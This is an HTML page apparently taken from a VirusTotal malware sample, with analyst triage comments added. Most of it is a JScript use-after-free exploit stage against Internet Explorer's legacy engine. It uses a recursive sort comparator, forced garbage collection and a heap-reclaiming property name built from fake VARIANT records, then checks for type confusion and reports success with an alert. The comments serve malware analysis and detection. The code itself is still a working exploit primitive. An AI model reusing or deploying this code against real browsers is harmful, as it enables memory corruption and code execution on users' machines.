from virustotal
|
|
https://www.virustotal.com/gui/file/1ad754caa89e08bb10ce538257879d0775bddd8a74b8ff14aaa3d92a2c35b543/detection
|
|
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
|
|
<script language="JScript.Compact">
|
|
|
|
|
|
|
|
// Analyst notes (sample triage).
// This script sits inside <script language="JScript.Compact"> on a page whose
// meta tag requests IE=EmulateIE8. Both markers are commonly used to route a
// page to Internet Explorer's legacy JScript engine instead of the newer one,
// so the pair is a useful static triage signal on its own.
// NOTE(review): the page names no CVE or advisory; anything said here about the
// targeted defect is inferred from the code shape and should be confirmed
// against the VirusTotal report referenced at the top of the file.

// Byte sizes of native types, going by the names. sizeof_PVOID = 4 suggests a
// 32-bit host process is assumed (inferred from the name only).
var sizeof_WCHAR = 2;
var sizeof_WORD = 2;
var sizeof_DWORD = 4;
var sizeof_PVOID = 4;
var sizeof_VAR = 0x10;

// The names below read like field offsets and sizes inside engine-internal
// structures. Nothing in this file reads any of them (or the sizeof_*
// constants above), so this listing looks like an early stage or test build
// of a larger script - TODO confirm against related samples.
var bstrVal = 8;
var sizeof_RegExpObj = 0xc0;
var m_pvarMaster = 0x10;
var m_varCode = 0x38;
var m_varSrc = 0x48;
var m_buf_Rsp = 0x10;
var lshift = 16;

// Pattern source passed to every `new RegExp(...)` created further down; it is
// the empty string here.
var reSrc = "";
|
|
|
|
|
|
/**
 * Packs a type tag and two 32-bit values into an 8-character string.
 *
 * Character layout: [vt, 0, 0, 0, low16(dword1), high16(dword1),
 * low16(dword2), high16(dword2)]. Eight UTF-16 code units are 16 bytes, the
 * same value as sizeof_VAR, so the string appears to mimic one 16-byte
 * variant record (inferred from the function name and that constant).
 *
 * The only caller in this file passes `vt` alone; `undefined & 0xFFFF`
 * evaluates to 0, so both payload dwords come out as zero in that case.
 *
 * @param {number} vt     Value placed in the first code unit.
 * @param {number} dword1 First 32-bit value, split into two 16-bit halves.
 * @param {number} dword2 Second 32-bit value, split the same way.
 * @returns {string} String of exactly eight UTF-16 code units.
 */
function makeVariant(vt, dword1, dword2) {
    var charCodes = new Array();
    charCodes.push(vt, 0x00, 0x00, 0x00, dword1 & 0xFFFF, (dword1 >> 16) & 0xFFFF, dword2 & 0xFFFF, (dword2 >> 16) & 0xFFFF);
    return String.fromCharCode.apply(null, charCodes);
}
|
|
|
|
|
|
// Global bookkeeping arrays shared by the top-level code and
// FreeingComparator. Their roles, as far as this file shows:
//   objs        - scratch objects allocated and dropped before a forced GC
//   rrefs       - the RegExp objects themselves (cleared again later)
//   erefs       - first set of references to those RegExps, kept alive
//   eerefs      - second set of references, deliberately dropped later
//   nrefs       - values the comparator pushes while its recursion unwinds
//   dummyArrs   - two-element arrays whose sort() re-enters the comparator
//   propHolders - arrays that later receive one long-named property each
//   m           - sparse extra arrays allocated every mod_p-th iteration
// `refs` is declared but never used in this file.
var objs = new Array();
var refs = new Array();
var nrefs = new Array();
var rrefs = new Array();
var erefs = new Array();
var eerefs = new Array();
var dummyArrs = new Array();
var propHolders = new Array();
var refsCount = 0;
// 2 * 100 - 4 = 196: number of RegExp objects created and also the depth at
// which the comparator stops recursing.
var refsLimit = 2 * 100 - 4;
// 0x17a = 378: target length, in UTF-16 code units, of the property name built
// at the end of this block.
var reallocPropertyNameLength = 0x17a;
var m = new Array();
var mod_p = 51;

// Host fingerprinting: `window` present without `WScript` means a browser
// host. The tuning value differs per host, which tells an analyst the author
// expected the script to run in more than one JScript host.
if (typeof window != "undefined" && typeof WScript == "undefined") {
    mod_p = 37;
}

// Neither `window` nor `WScript` exists: some third host.
// NOTE(review): which host this branch is meant for is not visible here.
if (typeof window == "undefined" && typeof WScript == "undefined") {
    refsLimit = 100;
    mod_p = 67;
}

// Pre-create 0x1000 empty arrays so the later property assignments do not
// have to allocate the holder objects themselves.
for (var i = 0; i < 0x1000; i++) {
    propHolders[i] = new Array();
}

// One small array per recursion level; each is sorted exactly once.
for (var i = 0; i < refsLimit; i++) {
    dummyArrs[i] = new Array(1, 2);
}

// Build the long property name: two NUL characters, then 8-character records
// from makeVariant(0x0082) until the length reaches 0x17a (2 + 47 * 8 = 378),
// then one trailing "\u0005" for 379 code units in total.
// A property name made of a repeating fixed-size binary record is a strong
// static indicator; presumably its size is chosen so the name's backing
// allocation reuses recently freed memory (inferred from the "realloc" naming).
var reallocPropertyName = "\u0000\u0000";
while (reallocPropertyName.length < reallocPropertyNameLength) {
    reallocPropertyName += makeVariant(0x0082);
}
reallocPropertyName += "\u0005";
|
|
|
|
/**
 * Sort comparator that re-enters Array.prototype.sort once per call until
 * refsCount reaches refsLimit, then releases references and forces garbage
 * collection while the outer comparator frames are still on the stack.
 *
 * Below the limit, each frame overwrites its own parameter `a` with
 * eerefs[refsCount], recurses through dummyArrs[refsCount].sort(), and only
 * after the nested call returns pushes `a` to nrefs. At the limit, every
 * script-visible reference held in eerefs (and m) is cleared before
 * CollectGarbage() runs, so the values sitting in the suspended frames'
 * `a` slots are the ones whose lifetime the script is probing.
 *
 * NOTE(review): this is the shape of a use-after-free probe against a
 * collector that does not account for comparator arguments; that reading is
 * inferred from the code and is not stated anywhere on the page.
 *
 * Detection-relevant traits: a comparator that calls sort() on a different
 * array with itself, explicit CollectGarbage() calls inside a callback, and a
 * bulk assignment of one very long property name right after collection.
 *
 * @param {*} a First element under comparison; overwritten below the limit.
 * @param {*} b Second element under comparison; never read.
 * @returns {number} Always 0, so the sort order itself is irrelevant.
 */
function FreeingComparator(a, b) {
    refsCount++;

    if (refsCount >= refsLimit) {
        // Allocate and drop 100 * 100 throwaway objects so the collection
        // below has plenty of unreachable objects to process.
        for (var i = 0; i < 100 * 100; i++) {
            objs[i] = new Object();
        }

        for (var i = 0; i < 100 * 100; i++) {
            objs[i] = null;
        }

        CollectGarbage();

        // Drop the second reference set and the sparse `m` arrays, entry by
        // entry and then as whole arrays, before collecting a second time.
        for (var i = 0; i < refsLimit; i++) {
            eerefs[i] = null;
            if (i % mod_p == 0) {
                m[i] = null;
            }
        }
        m = null;
        eerefs = null;

        CollectGarbage();

        // Immediately request 0x1000 allocations for the same long property
        // name, one per pre-built holder array.
        for (var i = 0; i < 0x1000; i++) {
            propHolders[i][reallocPropertyName] = 1;
        }
    } else {
        // Keep the value only in this frame's argument slot across the
        // nested sort() call.
        a = eerefs[refsCount];

        dummyArrs[refsCount].sort(FreeingComparator);

        // Runs during unwind, i.e. after the deepest frame has already
        // forced collection.
        nrefs.push(a);
    }

    return 0;
}
|
|
|
|
|
|
// Create refsLimit RegExp objects from the (empty) pattern source.
for (var i = 0; i < refsLimit; i++) {
    rrefs[i] = new RegExp(reSrc);
}

// Fetch each RegExp back through an Enumerator over a one-element array and
// store the result in erefs. Enumerator is specific to Microsoft's script
// hosts, so its presence narrows down the intended runtime.
// `delete e` / `delete arr` target var-declared variables and therefore have
// no effect; the preceding null assignments are what release the objects.
for (var i = 0; i < refsLimit; i++) {
    var arr = new Array(rrefs[i]);
    var e = new Enumerator(arr);
    e.moveFirst();
    erefs[i] = e.item();
    e = null;
    delete e;
    arr = null;
    delete arr;
}

// Same fetch a second time, now into eerefs, with an extra empty array
// allocated in `m` on every mod_p-th iteration. The direct reference in
// rrefs is removed as well, leaving erefs and eerefs as the only
// script-visible holders of each RegExp.
for (var i = 0; i < refsLimit; i++) {
    var arr = new Array(rrefs[i]);
    var e = new Enumerator(arr);
    e.moveFirst();
    eerefs[i] = e.item();
    if (i % mod_p == 0) {
        m[i] = new Array();
    }
    e = null;
    delete e;
    arr = null;
    delete arr;
    rrefs[i] = null;
    delete rrefs[i];
}

// Entry point of the recursive comparator chain: sorting the first
// two-element array invokes FreeingComparator, which recurses through the
// remaining dummyArrs entries.
dummyArrs[0].sort(FreeingComparator);
|
|
|
|
|
|
// Read the `source` property of every object in erefs by throwing it and
// reading it back from the catch binding. `srcs` is filled here but never
// read again in this file.
// NOTE(review): why the value is routed through throw/catch instead of being
// read directly is not evident from this listing.
var srcs = new Array();

for (var i = 0; i < refsLimit; i++) {
    try {
        throw erefs[i];
    }
    catch (r) {
        srcs[i] = r.source;
    }
}

// Success check. Every value pushed to nrefs started out as a RegExp object,
// so an entry whose typeof is "number" means the slot no longer describes the
// object that was stored there. The first such index is recorded.
var leakIndex = -1;

for (var i = 0; i < refsLimit; i++) {
    try {
        if ((typeof nrefs[i]) === "number") {
            leakIndex = i;
            break;
        }
    }
    catch (e) {
        // Deliberately ignored: a failing typeof on one entry just moves the
        // scan on to the next index.
    }
}

// The script ends by reporting the outcome only: an Error with the literal
// message below when no such entry was found, otherwise an alert() showing
// the index. Nothing further is done with the result in this file, which is
// consistent with a proof-of-concept or test harness rather than a complete
// payload - TODO confirm against the sample's dynamic-analysis report.
if (leakIndex == -1) {
    throw new Error("e dress.");
} else {
    alert(leakIndex);
}
|
|
|
|
|
|
|
|
</script>
|
|
</head>
|
|
<body>
|
|
</body>
|
|
</html>
|